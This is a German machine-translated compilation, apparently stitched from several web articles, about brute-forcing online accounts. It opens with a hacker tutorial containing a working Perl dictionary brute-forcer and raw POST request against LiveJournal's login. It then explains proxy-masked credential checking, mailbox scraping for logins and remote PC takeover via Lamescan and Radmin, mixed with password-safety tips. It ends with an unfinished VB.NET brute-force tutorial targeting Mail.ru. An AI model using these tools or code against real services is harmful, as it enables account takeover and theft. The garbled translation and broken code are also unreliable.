Brute-Force-Passwortwiederherstellung. Was ist Account Brute Force? Was ist der Unterschied zwischen einem Rohling und einem Dame?

Abschnitte der Website

Die Wahl des Herausgebers:

Es gibt ein berühmtes Sprichwort: als
Besser ist es, zu betteln und sich selbst zu demütigen<вырезано
Zensur> und schweigen :). Deshalb haben wir heute
Wir werden Brute-Force schreiben, was einfach ist
wird einigen Amerikanern im LiveJournal die Hände brechen
Mist :). Natürlich muss man wählen
ein Opfer, das danach ein paar Nachrichten schickte
Registrierung, und verschwand dann im Wasser
Ich habe es gerade im Livejournal gepostet. Solch
Es gibt viele Konten und sie können auch ohne gefunden werden
Probleme.

Kommen wir also zurück zu unserer Idee. Als erstes werden wir
Sie müssen wissen, wie Sie sich anmelden
System. Wenn Sie auf www.livejournal.com/login.bml gehen, werden wir sehen
In der oberen rechten Ecke befindet sich ein kleines Formular für
Anmeldung Nein, ich verurteile nicht den Großen in der Mitte
Bildschirm. Nachdem ich mir den HTML-Code angesehen hatte, wählte ich ihn aus
klein. Tatsache ist, dass alles in dieser Form vorliegt
zwei Parameter, im Gegensatz zum vollständigen. Unser
Zukünftige rohe Gewalt muss zumindest übertragen werden
Daten für eine hohe Effizienz
Konzentrieren wir uns auf diese Form.

Das Formular hat zwei Parameter: Benutzer und Passwort. Ich selbst
Das Skript kann optional sein
mode-Parameter, dessen Wert „login“ ist.
Anscheinend funktioniert bei der Übergabe von Benutzer und Passwort das System
impliziert eine Autorisierung. Ungeduldig
indem Sie den Link http://www.livejournal.com/login.bml?user=fuck&password=fucked in Ihren Browser eingeben
(Natürlich wurden alle Namen aus Gründen der Zweckmäßigkeit geändert
Verschwörung :)), ich habe eine Wende erhalten.
Das System wurde nur für die POST-Methode entwickelt.
Aber ich bin ein hartnäckiger Mensch und konnte nicht einmal widerstehen
dieser Schutz:].

Der nächste Schritt bestand darin, den Speicher wiederherzustellen
bezüglich der Funktionsweise der POST-Methode. Für ihn
Relevant ist die Übertragung der folgenden zwingenden Anforderungen
Parameter an den Server:

POST
Gastgeber
Inhaltslänge

eigentlich ein Beitrag :)

Nachdem ich eine Anfrage grob skizziert habe
Server, ich habe Folgendes erhalten:

POST /login.bml HTTP/1.1
Gastgeber: www.livejournal.com
Inhaltstyp: application/x-www-form-urlencoded
Inhaltslänge: 26

user=fuck&password=fucked

Seltsamerweise hat es nicht funktioniert :). System
verflucht wegen des falschen Passwortes. Ich dachte,
Es gibt eine Prüfung für Referer und UserAgent, aber ich habe einen Fehler gemacht.
Beim Ersetzen gefälschter Parameter
Der Server hat auch die Antwort „Passwort falsch“ zurückgegeben. Wie
Es stellte sich heraus, wenn man es nach dem Passwort einfügte
&-Symbol und erhöhen Sie die Länge der Zeile um
eins, dann hat der Server die Daten erfolgreich gefressen und
zurückgegeben Loginned.

Ich wollte wirklich nicht alles rauspumpen
lange HTML-Zeile und schneide daraus eine Zeile ab
Angemeldet. Ich wollte mich auf ein bescheidenes Recv beschränken
ein Kilobyte Daten :). Es war möglich
da der Server Cookies in die Kopfzeilen eingefügt hat.
Bei erfolgreicher Antwort enthielten diese Cookies
Benutzername und verschlüsseltes Passwort,
ungefähr in diesem Format:

Set-Cookie: ljsession=ws:fuck:1:fDjwfWdsC; path=/; HttpOnly

Nichts hinderte uns daran zu prüfen, ob der Header enthält
Benutzernamen eingeben und wenn es einen gibt, stoppen Sie
Brute Force und schreiben Sie in das Protokollkonto.

Theoretisch wurde Brute Force geschrieben. Links
Setzen Sie diese Angelegenheit in die Tat um. ICH
Ich habe Perl zum Codieren verwendet, weil ich es kenne
Die Sprache ist bereits im dritten Jahr und passt perfekt
für meine Ideen. Nachdem ich nach meiner Schraube gesucht habe
Brute-Force-Vorlage, ich habe eine MIME-Brute-Force-Vorlage für httpd-Konten gefunden,
was ich einmal auf dieser Seite beschrieben habe :).
Nachdem ich es ein wenig geändert hatte, bekam ich ein volles
LiveJournal rohe Gewalt. Sein einziger Nachteil
ist Single-Threaded, aber dafür
Als cooler Programmierer wie du glaube ich nicht, dass das passieren wird
großes Problem :). Es bleibt für Dich
Multithreading implementieren, oder
Benutze meine Demoversion ;).

Also der eigentliche Code:

#!/usr/bin/perl
verwenden IO::Socket; ## Verwendung von Sockets
$|++; ## Zuwachs
puffern
$server="www.livejournal.com"; ## Legen wir fest
Server
$port="80"; ## Und auch
Hafen :)
$logfile="cracked.log"; ##Hier
Einen gehackten Account schreiben
$words="bigdict.txt"; ## Unser
ein großes Wörterbuch, das als Leitfaden dient
rohe Gewalt
$user="fuck"; ## Benutzer,
was wir brechen
$dir="/login.bml"; ## Skript,
was den Status zurückgibt
open(file, "$words") oder die print "$!\n";
@data= ;
$total=@data;
Datei schließen; ##Öffnen wir
Wörterbuch, schreibe alle Wörter in ein Array
foreach $pass (@data) ( ##Radeln Sie vorbei
jedes Wort
$i++;
chomp($pass);
$socket=IO::Socket::INET->new(PeerAddr => $server,
PeerPort => $port,
Proto => tcp)
oder die Ausgabe „Es konnte keine Verbindung zu $server:$port\n hergestellt werden“; ##
Stellen Sie eine Verbindung zu livejournal.com her
$socket->autoflush(1); ##
Wir unterbrechen die Pufferung (nur für den Fall, weil...
aufgrund von Zahlungsverzug wird es gekürzt)
$post="user=$user&password=$pass&"; ##
Erstellen einer POST-Anfrage
$len=length($post);
$len+=1; ##Finden Sie die Länge
Abfrage (Phrase + \r\n)
print $socket „POST $dir HTTP/1.1\r\n“;
print $socket „Host: www.livejournal.com\r\n“;;
print $socket „Content-Type: application/x-www-form-urlencoded\r\n“;
print $socket „Verbindung: Schließen\r\n“;
print $socket "Content-Length: $len\r\n";
print $socket "\r\n$post\r\n";

## An den Socket senden
langer Header

$socket->recv($answer,1024); ## UND
Leserückgabe = 1 KB Daten

if ($answer=~/\:$user\:/) (
open(logf, ">>$logfile") or die print "$!\n";
print logf „$user:$pass ist OK!!!\n“;
logf schließen;
print „$user:$pass ist OK!!!\n“;
Ausgang 0; ## Wenn es enthält
eine Zeile wie:user: – Schreiben Sie ein Protokoll und vervollständigen Sie das Protokoll.
} ## Ansonsten schauen wir mal nach
nächstes Passwort
}

Das ist eigentlich die ganze rohe Gewalt. Verifiziert
Für mich persönlich funktioniert es wie ein Zauber :). Aber Konten
Ich werde es dir nicht zur Überprüfung geben – ich bin gierig ;), testi
alleine. Wie Sie sehen, ist alles einfach umzusetzen,
wenn du es nur willst.

Brute Force (abgeleitet von der englischen Phrase: Brute Force) ist eine Art Hackerangriff – eine Methode zum Hacken von Konten in Computersystemen, Zahlungs-/Bankdiensten und Websites durch die automatisierte Auswahl von Passwort- und Login-Kombinationen.

Brute Force basiert auf der gleichnamigen mathematischen Methode (Brute Force), bei der durch Durchsuchen verschiedener Optionen die richtige Lösung – eine endliche Zahl oder eine symbolische Kombination – gefunden wird. Tatsächlich wird jeder Wert aus einem bestimmten Satz möglicher Antworten (Lösungen) auf seine Richtigkeit überprüft.

Wie rohe Gewalt funktioniert

Ein Hacker schreibt ein spezielles Programm zum Erraten von Passwörtern oder nutzt eine vorgefertigte Lösung seiner Kollegen. Es kann auf einen bestimmten E-Mail-Dienst, eine Website oder ein soziales Netzwerk abzielen (d. h. es ist zum Hacken einer bestimmten Ressource gedacht). Als nächstes werden Vorbereitungen für das Hacken getroffen. Es besteht aus folgenden Phasen:

Erstellung einer Proxy-Liste

Um die wahre IP-Adresse des Computers zu verbergen, von dem aus der Angriff ausgeführt wird, und um eine Blockierung von der Website aus zu verhindern, auf der das Konto gehackt werden muss, wird eine Internetverbindung über einen Proxyserver konfiguriert.

Die Suche nach Proxy-Adressen/Ports erfolgt im Proxy Grabber. Dieses Dienstprogramm ruft unabhängig alle Daten für die Verbindung zu Zwischenservern von Websites ab, die Proxys bereitstellen (diese sind in der Liste angegeben). Mit anderen Worten: Es wird ein Proxy gesammelt.

Die resultierende Datenbank wird in einer separaten Textdatei gespeichert. Anschließend werden alle darin enthaltenen Serveradressen im Proxy-Checker auf Funktionsfähigkeit überprüft. Sehr oft kombinieren Programme, die für automatisiertes Proxy-Mining entwickelt wurden, die Funktionen eines Grabbers und eines Checkers.

Als Ergebnis erhalten Sie eine vorgefertigte Proxy-Liste in Form einer IP-/Port-Liste, gespeichert in einer TXT-Datei. (Sie benötigen es beim Einrichten des Brute-Force-Programms).

Suche nach Basen für Brute

Sie müssen ein Wörterbuch mit Brute Force verbinden – einem bestimmten Satz von Kombinationen aus Passwörtern und Logins – die es im Login-Formular ersetzt. Sie hat, wie die Proxy-Liste, die Form einer Liste in einer regulären Textdatei (.txt). Wörterbücher, auch Datenbanken genannt, werden über Hacker-Foren, Websites und Datei-Hosting-Dienste verbreitet. Erfahrenere „Handwerker“ stellen sie selbst her und stellen sie gegen eine Gebühr allen zur Verfügung. Je größer die Basis (Anzahl der Kombinationen, Logins, Konten), desto besser (für den Hacker) – desto größer die Wahrscheinlichkeit eines Hackererfolgs.

Brute-Force-Einrichtung

Die Proxy-Liste wird geladen; Das Auswahlprogramm ändert den Proxy automatisch, sodass der Webserver den Angriff und dementsprechend die Quelle (Host) des Angriffs nicht erkennt.

Ein Wörterbuch mit Passwort-/Login-Kombinationen ist angeschlossen. Die Anzahl der Threads wird festgelegt – wie viele Kombinationen Brute-Force gleichzeitig prüft. Ein leistungsstarker Computer mit hoher Internetgeschwindigkeit kann souverän 120-200 Streams bewältigen (das ist der optimale Wert). Die Geschwindigkeit des Brutes hängt direkt von dieser Einstellung ab. Wenn Sie beispielsweise nur 10 Threads festlegen, erfolgt die Auswahl sehr langsam.

Brutale Gewalt ausführen

Das Programm zeichnet erfolgreiche Hackversuche auf: Es speichert die verknüpften Konten (Passwort/Login) in einer Datei. Die Dauer des Auswahlverfahrens beträgt mehrere Stunden bis mehrere Tage. Allerdings ist es aufgrund der hohen kryptografischen Stärke der Anmeldedaten oder der Implementierung anderer Schutzmaßnahmen durch den Angreifer nicht immer effektiv.

Arten von roher Gewalt

Persönliches Hacken

Auf der Suche nach einem bestimmten Konto – in einem sozialen Netzwerk, bei einem E-Mail-Dienst usw. Durch oder im Prozess der virtuellen Kommunikation entlockt der Angreifer dem Opfer ein Login, um auf eine Website zuzugreifen. Dann knackt er das Passwort mit Brute-Force-Methoden: Er gibt mit Brute-Force die Adresse der Webressource und den erhaltenen Login an und verbindet das Wörterbuch.

Die Wahrscheinlichkeit eines solchen Hacks ist beispielsweise im Vergleich zum gleichen XSS-Angriff gering. Dies kann erfolgreich sein, wenn der Kontoinhaber ein Passwort mit 6–7 Zeichen und einer einfachen Symbolkombination verwendet. Andernfalls wird das „Lösen“ stabilerer Varianten von 12, 15, 20 Buchstaben, Zahlen und Sonderzeichen Jahre dauern – Dutzende und Hunderte von Jahren, basierend auf den Berechnungen der mathematischen Suchformel.

Brut/Check

Eine Datenbank mit Logins/Passwörtern aus Postfächern eines Mail-Dienstes (z. B. mail.ru) oder anderer ist mit Brute Force verbunden. Und eine Proxy-Liste – um den Knoten zu maskieren (da E-Mail-Webdienste einen Angriff schnell erkennen, der auf mehreren Anfragen von einer IP-Adresse basiert).

Die Optionen des Brutes zeigen eine Liste von Schlüsselwörtern (normalerweise Site-Namen) an – Orientierungspunkte, anhand derer er nach Anmeldeinformationen in gehackten Postfächern sucht (zum Beispiel: Steampowered, Worldoftanks, 4Game, VK). Oder eine bestimmte Internetressource.

Bei der Registrierung in einem Online-Spiel, sozialen Netzwerk oder Forum gibt ein Benutzer erwartungsgemäß seine E-Mail-Adresse (Postfach) an. Der Webdienst sendet eine Nachricht mit Anmeldeinformationen und einem Link zur Bestätigung der Registrierung an die angegebene Adresse. Es sind diese Briefe, nach denen Brute Force sucht, um daraus Logins und Passwörter zu extrahieren.

Klicken Sie auf „START“ und das Cracking-Programm beginnt mit roher Gewalt. Es funktioniert nach folgendem Algorithmus:

Lädt den Benutzernamen/das Passwort für die E-Mail aus der Datenbank.
Überprüft den Zugriff oder „überprüft“ (automatische Anmeldung): Wenn es möglich ist, sich in das Konto einzuloggen, fügt es eine in der Spalte „Gut“ hinzu (das bedeutet, dass eine weitere geschäftliche E-Mail gefunden wurde) und beginnt mit der Anzeige (siehe die folgenden Punkte). ); Wenn kein Zugriff besteht, wird es als fehlerhaft aufgeführt.
Bei allen „Beeps“ (offenen E-Mails) scannt Brute Force Briefe entsprechend der vom Hacker angegebenen Anfrage – das heißt, es sucht nach Logins/Passwörtern für die angegebenen Websites und Zahlungssysteme.
Wenn die benötigten Daten gefunden werden, kopiert es diese und schreibt sie in eine separate Datei.

Dadurch kommt es zu einem massiven „Hijacking“ von Konten – von Dutzenden bis hin zu Hunderten. Der Angreifer verfügt über die erhaltenen „Trophäen“ nach eigenem Ermessen – Verkauf, Tausch, Datenerfassung, Gelddiebstahl.

Computer-Hacking aus der Ferne

Brute Force wird in Verbindung mit anderen Hacker-Dienstprogrammen eingesetzt, um über einen Internetkanal Fernzugriff auf den PC eines passwortgeschützten Opfers zu erhalten.

Diese Art von Angriff besteht aus den folgenden Phasen:

Es wird nach IP-Netzwerken gesucht, in denen der Angriff auf Benutzercomputer durchgeführt wird. Adressbereiche werden aus speziellen Datenbanken oder durch spezielle Programme, wie z. B. IP Geo, übernommen. Darin können Sie IP-Netzwerke für einen bestimmten Bezirk, eine Region und sogar eine Stadt auswählen.
Ausgewählte IP-Bereiche und Auswahlwörterbücher werden in den Einstellungen des Lamescan-Brute-Force-Programms (oder seines Analogons) festgelegt, das für die Remote-Brute-Force-Anmeldung/Passwort vorgesehen ist. Nach dem Start führt Lamescan Folgendes aus:

stellt eine Verbindung zu jeder IP aus einem bestimmten Bereich her;
Nach dem Verbindungsaufbau wird versucht, über Port 4899 eine Verbindung zum Host (PC) herzustellen (möglicherweise gibt es jedoch auch andere Optionen);
wenn der Port offen ist: versucht, Zugriff auf das System zu erhalten, führt bei der Aufforderung zur Eingabe eines Passworts eine Vermutung durch; Bei Erfolg werden die IP-Adresse des Hosts (Computers) und die Anmeldeinformationen in seiner Datenbank gespeichert.

Der Hacker startet das Dienstprogramm Radmin, das zur Verwaltung von Remote-PCs entwickelt wurde. Legt die Netzwerkkoordinaten des Opfers fest (IP, Login und Passwort) und erlangt die volle Kontrolle über das System – den Desktop (visuell auf dem Display des Computers des Angreifers angezeigt), Dateiverzeichnisse, Einstellungen.

Programme für Brutus

Klassische Brute-Force, einer der allerersten. Es verliert jedoch nicht an Relevanz und konkurriert mit neuen Lösungen. Es verfügt über einen schnellen Brute-Force-Algorithmus und unterstützt alle wichtigen Internetprotokolle – TCP/IP, POP3, HTTP usw. Es kann Cookies fälschen. Zerstört das Wörterbuch und generiert selbstständig Passwörter.

Leistungsstarker Brute-Checker. Ausgestattet mit einem erweiterten Arsenal an Funktionen für die Arbeit mit Datenbanken (Prüfung, Sortierung nach Domänen). Unterstützt verschiedene Arten von Proxys und prüft deren Funktionalität. Scannt Briefe in Postfächern anhand von Einstellungen wie Datum, Schlüsselwort, Adresse und ungelesenen Nachrichten. Kann Briefe von Mail.ru und Yandex herunterladen.

Appnimi Password Unlocker

Ein Programm zum brutalen Erzwingen eines Passworts für eine Datei auf einem lokalen Computer. Eine Art Arbeitstier. Mit der kostenlosen Version des Programms können Sie Passwörter mit maximal 5 Zeichen auswählen. Hier erfahren Sie, wie Sie Appnimi Password Unlocker installieren und verwenden

In Spielen, sozialen Netzwerken etc., die illegal erlangt, also gehackt oder gestohlen wurden. Natürlich ist es ziemlich schwer zu verstehen, was ein Rohling ist und wie er funktioniert, aber wir werden versuchen, es zu verstehen. Doch zunächst wollen wir herausfinden, wie wir vermeiden können, das nächste Opfer von Angreifern zu werden.

Was ist rohe Gewalt und wie kann man sich davor schützen?

So gibt es spezielle Software, die es ermöglicht, durch Auswahl von Zahlen- und Buchstabenkombinationen die richtigen Passwörter für bestehende Logins, E-Mails etc. zu finden. Natürlich gibt es bei der Bedienung solcher Programme eine Reihe von Besonderheiten. Je länger und komplexer beispielsweise das Passwort ist, desto länger wird es dauern, es zu knacken, und es kann so weit kommen, dass die Brute-Force-Methode versagt. Was die Zeit betrifft, hängt viel von der Rechenleistung der Geräte und der Internetverbindung ab. Daher kann der Vorgang mehrere Minuten dauern und sich bis zu einem Tag oder länger hinziehen.

Sie wissen wahrscheinlich bereits, was Account-Brute-Force ist. Aus Sicherheitsgründen ist es, wie oben erwähnt, ratsam, ein Passwort festzulegen, das man sich nur schwer merken kann. Zum Beispiel RKGJH4hKn2. Man kann mit Sicherheit sagen, dass es ziemlich problematisch sein wird, es zu hacken. Darüber hinaus müssen Sie bedenken, dass beispielsweise viele identische Buchstaben ebenso wie Zahlen keine Wirkung haben. Alles sollte durcheinander und gemischt sein, es empfiehlt sich, Groß- und Kleinbuchstaben abzuwechseln.

Was ist eine Brute-Basis?

Natürlich funktioniert das Programm nicht, wenn keine Daten vorhanden sind. Wenn sie also keine Möglichkeit hat, Passwörter zu erraten, wird sie dies nicht tun. Eine Datenbank besteht aus einer Reihe von Passwörtern und Logins. Je umfangreicher diese Liste ist, desto größer ist die Wahrscheinlichkeit, dass das Konto gehackt wird. Viel hängt davon ab, welche Kombinationen darin vorhanden sind, d. h. je kompetenter es komponiert ist, desto besser. Es ist auch erwähnenswert, dass die Datenbank nicht nur Passwörter, sondern auch Logins enthält, da Brute Force, was auf Englisch „Brute Force“ bedeutet, beide gleichzeitig auswählen kann.

Es ist erwähnenswert, dass die Datei selbst, in der alle Datensätze gespeichert sind, ziemlich groß ist. Die Mindestlänge der Kombination beträgt 3 Buchstaben und Zahlen, die Höchstlänge 8-16, je nach Programm und Version. Die Auswahl beginnt mit dem Buchstaben „A“ und endet mit dem letzten Buchstaben des englischen oder russischen Alphabets. Dabei handelt es sich im Wesentlichen um alle Informationen zu den Datenbanken, die für Sie nützlich sein können.

Wer braucht das und warum?

Es ist schwierig, diese Frage eindeutig zu beantworten. Menschen versuchen aus vielen Gründen, Konten zu hacken. Es könnte nur Spaß sein, der Wunsch, die Briefe anderer Leute zu lesen, ungültige Nachrichten zu senden usw. Die Sache ist, dass dies illegal ist. Darüber hinaus kann es sich um einen echten Diebstahl handeln und Sie müssen sich dafür verantworten. Es wird dringend davon abgeraten, solche Dinge zu tun, zumal es manchmal Zeitverschwendung ist.

Selbst wenn Ihr Konto gehackt wird, kann es schnell und einfach wiederhergestellt werden. Dies geht besonders einfach, wenn Sie bei der Registrierung echte Daten angegeben haben. Bei hastig erstellten Konten wird es viel schwieriger sein, sie zurückzubekommen. Aber wie die Praxis zeigt, werden solche Konten von Hackern nicht geschätzt. Es hat keinen Sinn, jemandem den Account oder die E-Mails wegzunehmen, die nichts Nützliches enthalten, und es besteht keine Notwendigkeit, noch einmal darüber zu reden.

Wer übt rohe Gewalt aus?

Es wäre nicht überflüssig zu sagen, dass dies von sogenannten Hackern geschieht. Dies gilt für groß angelegte Hacks. Im Großen und Ganzen verdienen solche Menschen ihren Lebensunterhalt damit und tun dies sehr geschickt. Und das Schema funktioniert wie folgt. Mit roher Gewalt werden Logins und Passwörter (eine bestimmte Anzahl) ausgewählt und das Ganze dann im Großhandel an Kunden verkauft. Das heißt, die Hacker selbst nutzen das, was sie illegal erlangt haben, praktisch nicht, sondern verkaufen es einfach. Aber wer ist der Käufer, fragen Sie?

Es könnte jeder sein. Das Einzige, was man sagen kann, ist, dass sie mit dem Kauf einer großen Anzahl von Konten beschäftigt sind. Diese Konten werden dann an normale Benutzer verkauft, die dann überrascht sind, dass sie zu ihrem ursprünglichen Besitzer zurückgekehrt sind. Gleiches gilt für personenbezogene Daten von Zahlungssystemen (Webmoney, Qiwi). Neben der Möglichkeit, einen bestimmten Betrag zu erhalten, kann ein solches Konto verkauft werden, dies gilt insbesondere dann, wenn teure Zertifikate vorliegen, die die Kompetenz des Inhabers bestätigen.

Ein wenig über Proxyserver für Brute Force

Jeder Hacker mit Selbstachtung denkt zunächst darüber nach, wie er sich schützen kann. Und da das, was er tut, völlig illegal ist, muss dem besondere Aufmerksamkeit gewidmet werden. Wir wissen bereits, was Brute Force ist, und jetzt möchte ich Ihnen erklären, wie ein Proxyserver funktioniert. Dadurch bleiben Sie beim Konto-Hacking unentdeckt. Vereinfacht gesagt bleibt die IP-Adresse unbekannt. Dies ist der Hauptschutz für Personen, die die Konten anderer Personen hacken.

Aber das ist nicht alles. Nachdem das Konto gehackt wurde, müssen Sie sich anmelden. Aber selbst mit dem richtigen Benutzernamen und Passwort ist dies manchmal nicht einfach. Wenn Sie beispielsweise die IP-Adresse ändern, müssen Sie einen Sicherheitscode an Ihre E-Mail-Adresse oder Ihr Telefon senden. Ein solches System wird von Valve erfolgreich eingesetzt, insbesondere zum Schutz seines Produkts namens Steam. Für Brutus ist es natürlich schon klar geworden. Daher können wir uns in jedes Konto einloggen und erregen überhaupt keinen Verdacht, was das Verbrechen perfekt macht.

Dass das Passwort lang und komplex sein sollte, muss nicht noch einmal wiederholt werden. Es wird auch nicht empfohlen, Ihr Konto an überfüllten Orten oder am Arbeitsplatz zu verwenden, wo jeder einen Computer oder Laptop benutzen kann. Erstens kann ein spezielles Spionageprogramm verwendet werden, das sich merkt, welche Tasten gedrückt wurden; wie Sie wissen, wird es nicht schwierig sein, das Passwort herauszufinden.

Aber das ist noch nicht alles, was Sie wissen müssen. Es empfiehlt sich, sich das Passwort im Browser nicht zu merken, da es abgefangen werden kann. Es gibt Konten, bei denen Sie beim Einloggen sofort eine SMS mit einem Bestätigungscode auf Ihr Mobiltelefon erhalten. Wenn es also eintrifft und Sie nichts damit zu tun haben, ändern Sie das Passwort und handeln Sie am besten so schnell wie möglich.

Was ist der Unterschied zwischen einem Rohling und einem Dame?

Lassen Sie uns nun herausfinden, was der Unterschied zwischen diesen beiden Konzepten ist. Daher haben wir bereits entschieden, dass Sie mit Brute Force einen Benutzernamen und ein Passwort auswählen können, indem Sie einfach im Wörterbuch (Basis) suchen. Schauen wir uns ein Beispiel für das Hacken eines E-Mail-Dienstes an. Wir haben uns zum Beispiel Zugang verschafft, aber was tun als nächstes? In der Regel sind wir an Informationen über Konten in sozialen Netzwerken, Online-Spielen, Zahlungssystemen usw. interessiert. Daher überprüft der Prüfer das E-Mail-Passwort, das wir bereits haben, auf Übereinstimmungen.

Mit einfachen Worten: Wenn es beispielsweise mit dem auf VKontakte installierten übereinstimmt, erkennen wir es sofort. Wir können daraus schließen, dass uns dies unnötige Kopfschmerzen erspart. Folglich ist der Prozess stärker automatisiert und erfordert praktisch keine Beteiligung von uns. Jetzt wissen Sie, was Brute und Checker sind und wie diese Programme funktionieren.

Abschluss

Auf der Grundlage des Vorstehenden können bestimmte Schlussfolgerungen gezogen werden. Das Konto sollte nur auf einem persönlichen Computer genutzt werden, wenn der Zugriff durch Unbefugte ausgeschlossen ist. Gleiches gilt für Verbindungen zu kostenlosem WLAN, da die Möglichkeit des Abfangens des Datenstroms und des anschließenden Diebstahls Ihres Kontos besteht. Da du es bereits weißt, Brute, wird es für dich viel einfacher sein, dich zu verteidigen. Wie man so schön sagt: Wer sich bewusst ist, ist gewappnet. Denken Sie daran, dass es nur von Ihnen abhängt, wie gut Ihr Konto geschützt ist. Wenn Sie alles richtig gemacht haben, brauchen Sie sich keine Sorgen mehr zu machen, und es ist unwahrscheinlich, dass Sie wissen müssen, was Account Brute Force ist und welche Nuancen die Funktionsweise des Programms hat.

Hallo zusammen! Endlich habe ich die Zeit gefunden, einen langen Artikel zu schreiben.

Darin zeige ich Ihnen, wie man BruteForce (umgangssprachlich „brut“) schreibt.

1) Eine kleine Geschichte

Anfang des Jahres begann ich, im Internet nach Informationen zum Schreiben von Brute-Force-Texten zu suchen.

Es gab sehr wenig davon, ich musste sogar etwas aus dem Spanischen übersetzen =)).

Aber ich gab nicht auf und setzte meine Suche fort, und vor zwei Monaten habe ich alles herausgefunden und eine einfache Single-Threaded-Brute-Force-Methode geschrieben. Aber es waren weit entfernt von „Riesen“ wie „Brutus AET2“. Ich begann, nach Informationen zum Thema Multithreading zu suchen, und meine Suche war von Erfolg gekrönt. Jetzt sind alle Informationen gesammelt und ich schreibe diesen Artikel, damit diejenigen, die sich entschieden haben, mit roher Gewalt zu schreiben, nicht durch die Ecken des Netzwerks kriechen und Informationen sammeln müssen.

2) Theorie

In meiner vorherigen Geschichte habe ich das Wort Brute Force mehr als einmal erwähnt. Was ist es?

Ich zeige es Ihnen an einem Beispiel: Nehmen wir an, Sie haben Ihr E-Mail-Passwort vergessen (das passiert übrigens ziemlich oft).

Sie können versuchen, Ihr Passwort über eine Sicherheitsfrage oder ein Mobiltelefon wiederherzustellen. Wenn Sie jedoch kein Mobiltelefon besitzen und die Sicherheitsfrage lautet: „Wie viele Zähne hat die rechte Pfote meiner Katze?“

Was ist dann zu tun? Richtig, versuchen Sie, das Passwort zu erraten. Aber wie??? Manuell?? Natürlich nicht, dafür wurde rohe Gewalt geschaffen, um die rohe Gewalt für Sie auszuüben.

Das Funktionsprinzip ist einfach: Wir geben unsere E-Mail-Adresse an und verbinden eine Liste mit Passwörtern. Klicken Sie auf „Start“ und gehen Sie Ihrem Geschäft nach. Wenn das richtige Passwort gefunden wird, zeigt Brute Force es auf dem Bildschirm an.

Alles wäre gut, aber was wäre, wenn wir eine Million Passwörter in unserem Wörterbuch hätten? Brutus sendet eine Million Anfragen an den Server und der Server denkt, dass wir versuchen, das Postfach einer anderen Person zu hacken, und blockiert einfach unsere IP-Adresse. Wie dann?

Zu diesem Zweck werden Proxy-Server bereitgestellt. Ich werde Ihnen nicht sagen, was es ist, da es sich um ein ziemlich breites Thema handelt. Sie können über Proxys lesen. Kurz gesagt: Die Proxys ändern unsere IP und die Suche wird fortgesetzt.

Der letzte Punkt der Theorie sind Suchmodi.

Es gibt nur zwei davon: Single-Threaded und Multi-Threaded.

Im Single-Threaded-Modus nimmt Brute Force das erste Passwort und wartet auf eine Antwort vom Server. Wenn die Antwort eintrifft, wird das nächste Passwort übernommen usw.

Im Multithread-Modus erstellt Brute Force viele Threads. In jedem von ihnen kommt Brute Force vor, d. h. Brute Force muss nicht auf eine Antwort vom Server warten, um fortzufahren. Es wird einfach der nächste Thread erstellt und die Suche wird fortgesetzt.

Beispiel: Sie entscheiden sich, einen Film per Torrent herunterzuladen. Sie haben eine Torrent-Datei gefunden und mit dem Herunterladen begonnen. Während der Download läuft, sind Sie beispielsweise auf „Kontakt“ gegangen und haben mit Freunden korrespondiert. In einem Thread läuft der Browser, in einem anderen lädt der Torrent fleißig einen Film herunter und im dritten scannt das Antivirenprogramm das System usw.

Ich hoffe, ich habe es klar erklärt.

2) Lang erwartete Praxis

Während wir eine einfache Single-Thread-Brute Force schreiben (um unser Gehirn nicht zu überlasten), werde ich im zweiten Teil über die Erstellung und Änderung einer Multi-Thread-Brute Force sprechen

Proxy + Ich stelle meine Teile des Codes zur Verfügung, die Sie in Ihren Projekten verwenden können.

Also! Gehen.

Öffnen Sie VB.NET, erstellen Sie ein reguläres Projekt und erstellen Sie etwa Folgendes:

Jetzt müssen wir uns für den Server entscheiden und die Anfragen „schnüffeln“.

Ich zeige es Ihnen am Beispiel von Mail.ru:

Damit werden wir sehen, wie die Autorisierung auf dem Server erfolgt.

2) Starten Sie die eigenständige Version des Programms: 3

3) Gehen Sie zur Mail.ru-Mail und geben Sie die Daten ein, aber melden Sie sich noch nicht an:

4) Klicken Sie in HttpAnalyzer auf die Pause.

Wir kehren zu Mail Mail zurück und klicken auf Anmelden.

Nun zurück zum Schnüffler. Wir beobachten Folgendes:

Die POST-Anfrage für das Autorisierungsskript wird blau hervorgehoben.

Mal sehen, welche Daten gesendet werden:

Einloggen Einloggen

Domäne - Domäne

Passwort - Passwort

Saveauth – Müssen wir unsere Daten speichern (nicht genau sicher)

Zum letzten Parameter kann ich nichts sagen, aber wir brauchen ihn nicht :n =)

Versuchen wir, eine Anfrage zu senden:

Wenn alles korrekt eingegeben wurde, gelangen Sie zu Ihrer E-Mail.

Wenn nicht, wird eine Anmeldefehlermeldung angezeigt.

Gehen Sie dazu auf den Reiter Cookies. Uns interessiert die rechte Seite:

Wir sehen, dass zwei Cookies erstellt werden: Mpop und t.

„Set – Cookie“ – Header-Feld, das an den Server gesendet wird.

6) Geben wir nun die linken Daten ein und analysieren das Ergebnis.

Wir sehen, dass keine Cookies erstellt werden.

Großartig! Jetzt wissen wir, wie man Brute Force schreibt:

Lassen Sie uns zunächst ein Array deklarieren, in das wir Passwörter aus dem Wörterbuch einfügen:

Öffentliche PassList als neue ArrayList

Code für die Schaltfläche „…“ (drei Punkte):

Dim f As New OpenFileDialog „Erstellen Sie einen neuen Datei-Öffnungsdialog, wenn f.ShowDialog = Windows.Forms.DialogResult.OK und f.FileName<>"" Dann " Wenn der Benutzer eine Liste ausgewählt hat, dann PassList.AddRange(IO.File.ReadAllLines(f.FileName)) " Alle Passwörter in das Array einlesen txtPassList.Text=f.FileName " Den Pfad zur Datei anzeigen in das Textfeld End If

Nun der Code für die Schaltfläche „Suche starten“:

